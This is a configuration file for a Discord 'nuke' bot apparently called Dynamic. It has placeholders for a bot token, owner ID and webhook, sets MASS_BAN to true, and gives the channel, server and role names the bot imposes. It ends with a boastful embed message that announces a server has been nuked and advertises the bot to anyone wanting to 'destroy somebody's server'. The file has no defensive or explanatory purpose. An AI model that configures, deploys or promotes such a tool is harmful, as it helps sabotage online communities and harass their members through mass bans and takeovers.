BOT_TOKEN="TOKEN"
BOT_OWNER_ID="YOUR ID"

MASS_BAN=true

WEBHOOK_URL="WEBHOOK URL"
AVATAR_URL="https://media.discordapp.net/attachments/1160835997291003985/1193503823948423228/IMG_9971.jpg?ex=65acf40d&is=659a7f0d&hm=684237752ae744ae0fdb5f976abe83311569784d40822c2a47947c9512a69a38&=&format=webp&width=701&height=678"


CHANNEL_NAME="el-dynamic"
SERVER_NAME="<<DYNAM!C>>"
ROLE_NAME="DYNAMIC"


EMBED_TITLE="Your server has been nuked by Dynamic"
EMBED_DESCRIPTION="```\nDynamic is one of the most powerful discord nuke bot. Unfortunately this server has been nuked due to inactive admins.```\n\n### If you're interested in this bot or you need to destroy somebody's server you can join our discord server.\n\n\n**OpenDNB has:**\n\n* `Powerful bots with uptime 24/7`\n* `Good community`\n"